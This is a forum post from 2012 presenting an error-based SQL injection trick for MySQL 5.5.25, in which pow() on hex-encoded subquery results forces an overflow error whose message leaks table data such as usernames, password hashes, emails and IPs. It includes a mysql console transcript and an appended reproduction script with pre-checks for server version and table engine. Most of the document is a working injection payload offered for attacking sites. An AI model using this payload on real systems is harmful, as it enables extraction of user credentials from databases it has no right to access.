Pr0grammer | 2012-08-27 19:43 GMT
Long story short: a bug I found in the pow() function in MySQL 5.5.25 (this is the version I tested on) and, based on that bug, a method that can be used in ERROR BASED blind SQL injection on the named MySQL version (or somewhat lower versions).
It depends on a few conditions:
The table on the target site must be ENGINE=MYISAM.
The MySQL server version must be 5.5.25 or somewhat lower.
Code:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 61
Server version: 5.5.25 MySQL Community Server (GPL)
Copyright (c) 2000, 2011, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> \s
--------------
Connection id: 61
Current database:
Current user: root@localhost
SSL: Not in use
Using delimiter: ;
Server version: 5.5.25 MySQL Community Server (GPL)
Protocol version: 10
Connection: localhost via TCP/IP
Server characterset: latin1
Db characterset: latin1
Client characterset: latin1
Conn. characterset: latin1
TCP port: 3306
Uptime: 13 min 12 sec
Threads: 1 Questions: 184 Slow queries: 0 Opens: 42 Flush tables: 1 Open tables: 26 Queries per second avg: 0.232
--------------
mysql> select session_user() \g
+----------------+
| session_user() |
+----------------+
| root@localhost |
+----------------+
1 row in set (0.00 sec)
mysql> show create database sed165 \G
*************************** 1. row ***************************
Database: sed165
Create Database: CREATE DATABASE `sed165` /*!40100 DEFAULT CHARACTER SET utf8 COLLATE utf8_unicode_ci */
1 row in set (0.00 sec)
mysql> use sed165 \g
Query OK, 0 rows affected (0.00 sec)
mysql> \s
--------------
Connection id: 61
Current database: sed165
Current user: root@localhost
SSL: Not in use
Using delimiter: ;
Server version: 5.5.25 MySQL Community Server (GPL)
Protocol version: 10
Connection: localhost via TCP/IP
Server characterset: latin1
Db characterset: utf8
Client characterset: latin1
Conn. characterset: latin1
TCP port: 3306
Uptime: 13 min 51 sec
Threads: 1 Questions: 196 Slow queries: 0 Opens: 42 Flush tables: 1 Open tables: 26 Queries per second avg: 0.235
--------------
mysql> show create table sed_users \G
*************************** 1. row ***************************
Table: sed_users
Create Table: CREATE TABLE `sed_users` (
`user_id` int(11) unsigned NOT NULL AUTO_INCREMENT,
`user_banexpire` int(11) DEFAULT '0',
`user_name` varchar(24) NOT NULL DEFAULT '',
`user_password` varchar(32) NOT NULL DEFAULT '',
`user_maingrp` int(11) unsigned NOT NULL DEFAULT '4',
`user_country` char(2) NOT NULL DEFAULT '',
`user_text` text NOT NULL,
`user_avatar` varchar(255) NOT NULL DEFAULT '',
`user_photo` varchar(255) NOT NULL DEFAULT '',
`user_signature` varchar(255) NOT NULL DEFAULT '',
`user_extra1` varchar(255) NOT NULL DEFAULT '',
`user_extra2` varchar(255) NOT NULL DEFAULT '',
`user_extra3` varchar(255) NOT NULL DEFAULT '',
`user_extra4` varchar(255) NOT NULL DEFAULT '',
`user_extra5` varchar(255) NOT NULL DEFAULT '',
`user_extra6` text,
`user_extra7` text,
`user_extra8` text,
`user_extra9` text,
`user_occupation` varchar(64) NOT NULL DEFAULT '',
`user_location` varchar(64) NOT NULL DEFAULT '',
`user_timezone` varchar(32) NOT NULL DEFAULT '0',
`user_birthdate` int(11) NOT NULL DEFAULT '0',
`user_gender` char(1) NOT NULL DEFAULT 'U',
`user_irc` varchar(128) NOT NULL DEFAULT '',
`user_msn` varchar(64) NOT NULL DEFAULT '',
`user_icq` varchar(16) NOT NULL DEFAULT '',
`user_website` varchar(128) NOT NULL DEFAULT '',
`user_email` varchar(64) NOT NULL DEFAULT '',
`user_hideemail` tinyint(1) unsigned NOT NULL DEFAULT '1',
`user_pmnotify` tinyint(1) unsigned NOT NULL DEFAULT '0',
`user_newpm` tinyint(1) unsigned NOT NULL DEFAULT '0',
`user_skin` varchar(16) NOT NULL DEFAULT '',
`user_lang` varchar(16) NOT NULL DEFAULT '',
`user_regdate` int(11) NOT NULL DEFAULT '0',
`user_lastlog` int(11) NOT NULL DEFAULT '0',
`user_lastvisit` int(11) NOT NULL DEFAULT '0',
`user_lastip` varchar(16) NOT NULL DEFAULT '',
`user_logcount` int(11) unsigned NOT NULL DEFAULT '0',
`user_postcount` int(11) DEFAULT '0',
`user_sid` char(32) NOT NULL DEFAULT '',
`user_lostpass` char(32) NOT NULL DEFAULT '',
`user_auth` text,
PRIMARY KEY (`user_id`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=latin1
1 row in set (0.02 sec)
mysql> select count(0) from sed_users \g
+----------+
| count(0) |
+----------+
| 1 |
+----------+
1 row in set (0.00 sec)
mysql> select concat(useR_name,0x7c,user_password,0x7c,user_email,0x7c,user_lastip) from sed_users \g
+-----------------------------------------------------------------------+
| concat(useR_name,0x7c,user_password,0x7c,user_email,0x7c,user_lastip) |
+-----------------------------------------------------------------------+
| hacker|c4ca4238a0b923820dcc509a6f75849b|hacker@as.com|192.168.0.1 |
+-----------------------------------------------------------------------+
1 row in set (0.00 sec)
mysql> # FUN BEGINS
mysql> select pow((select hex((select concat_ws(user_name,user_password,user_email,user_lastip) from sed_users limit 1))),rand()*1e100) \G
ERROR 1690 (22003): DOUBLE value is out of range in 'pow(hex((select concat_ws('hacker','c4ca4238a0b923820dcc509a6f75849b','hacker@as.com','192.168.0.1') from dual limit 1)),(rand() * 1e100))'
mysql> # NOTICE hacker c4ca4238a0b923820dcc509a6f75849b in error message
mysql> \c
mysql> # And Now we will try it on ENGINE=INNODB
mysql> \c
mysql> alter table sed_users ENGINE=INNODB \g
Query OK, 1 row affected (0.13 sec)
Records: 1 Duplicates: 0 Warnings: 0
mysql> select pow((select hex((select concat_ws(user_name,user_password,user_email,user_lastip) from sed_users limit 1))),rand()*1e100) \G
ERROR 1690 (22003): DOUBLE value is out of range in 'pow(hex((select concat_ws(`sed165`.`sed_users`.`user_name`,`sed165`.`sed_users`.`user_password`,`sed165`.`sed_users`.`user_email`,`sed165`.`sed_users`.`user_lastip`) from `sed165`.`sed_users` limit 1)),(rand() * 1e100))'
mysql> # CLEAN
mysql> # THE END #
mysql> \c
mysql> \q
Can be useful for error-based blind SQL injections.
Works on a table if it's ENGINE=MYISAM.
Tested on: MySQL 5.5.25, OS: Windows XP 5.1.2600 Service Pack 2 Build 2600 (Win32)
Have Fun.
/AkaStep
http://pastebin.com/QbBRf3WQ
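The following script is an added reproduction of the trick shown in the transcript above; it is not part of the original post and uses a constructed table (`pow_demo.demo_users`, a cut-down version of `sed_users`) with the same single row and the same MD5('1') password hash. It adds the two checks a practitioner would run before trying the payload (server version and the target table's engine from `information_schema`), then runs the pow() query against the MyISAM table and again after converting it to InnoDB, so both ERROR 1690 messages from the transcript can be compared side by side. Note that the first argument of `CONCAT_WS()` is the separator, so the post's `concat_ws(user_name, ...)` used the username as the separator; the script passes `0x7c` ('|') explicitly instead. Two observations, stated here as my reading of the transcript rather than as claims from the post: the leaking error text says `from dual`, which is what the optimizer prints once a single-row table has been folded to constants, and the post's table holds exactly one row, so this script reproduces that exact condition; the page does not show what happens with a multi-row MyISAM table. Also, `POW()` converts the `HEX()` string to a DOUBLE using its leading decimal digits (e.g. `6861636` from `6861636B...`), which is why the base is always large enough to overflow against a `1e100`-scale exponent for printable-ASCII data.

```sql
-- Added example: reproduction of the pow() / ERROR 1690 data leak described above.
-- Not code from the original post. Database, table and row values are constructed.
-- Tested conditions on the page: MySQL 5.5.25; adjust nothing else.

CREATE DATABASE IF NOT EXISTS pow_demo DEFAULT CHARACTER SET utf8;
USE pow_demo;

-- Pre-check 1: the post reports this only for 5.5.25 "and somewhat lower".
SELECT VERSION() AS server_version;

DROP TABLE IF EXISTS demo_users;
CREATE TABLE demo_users (
  user_id       INT(11) UNSIGNED NOT NULL AUTO_INCREMENT,
  user_name     VARCHAR(24) NOT NULL DEFAULT '',
  user_password VARCHAR(32) NOT NULL DEFAULT '',
  user_email    VARCHAR(64) NOT NULL DEFAULT '',
  user_lastip   VARCHAR(16) NOT NULL DEFAULT '',
  PRIMARY KEY (user_id)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;

-- Exactly one row, as in the transcript (MD5('1') = c4ca4238a0b923820dcc509a6f75849b).
INSERT INTO demo_users (user_name, user_password, user_email, user_lastip)
VALUES ('hacker', MD5('1'), 'hacker@as.com', '192.168.0.1');

-- Pre-check 2: the engine and the (MyISAM-exact) row count of the target table.
SELECT TABLE_NAME, ENGINE, TABLE_ROWS
  FROM information_schema.TABLES
 WHERE TABLE_SCHEMA = DATABASE()
   AND TABLE_NAME   = 'demo_users';

-- The leak on MyISAM.
-- HEX() turns the row into a digit/letter string; POW() reads its leading
-- decimal digits as the base and RAND()*1e100 as the exponent, so the result
-- is out of DOUBLE range and the server raises ERROR 1690 (22003), quoting the
-- expression it was evaluating. Expected in the message on the one-row MyISAM
-- table: concat_ws('|','hacker','c4ca4238a0b923820dcc509a6f75849b',
--                  'hacker@as.com','192.168.0.1') from dual limit 1
SELECT POW(
  (SELECT HEX(
     (SELECT CONCAT_WS(0x7c, user_name, user_password, user_email, user_lastip)
        FROM demo_users LIMIT 1))),
  RAND() * 1e100);

-- Same query after switching the engine: the error is still raised, but the
-- expected message now names the columns (`pow_demo`.`demo_users`.`user_name`, ...)
-- instead of their values, matching the InnoDB half of the transcript.
ALTER TABLE demo_users ENGINE=InnoDB;

SELECT POW(
  (SELECT HEX(
     (SELECT CONCAT_WS(0x7c, user_name, user_password, user_email, user_lastip)
        FROM demo_users LIMIT 1))),
  RAND() * 1e100);

-- Clean up.
DROP DATABASE pow_demo;
```

Run the script in the `mysql` client with `--force` (or paste it statement by statement) so the two expected ERROR 1690 lines do not abort the session; the useful output is the error text, not a result set. Defensively, the same two pre-check queries are what to run on your own servers to see which tables meet the conditions the post lists, and the engine column of `information_schema.TABLES` is the quickest way to confirm whether a given table is still MyISAM.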
Anti-armenia.ORG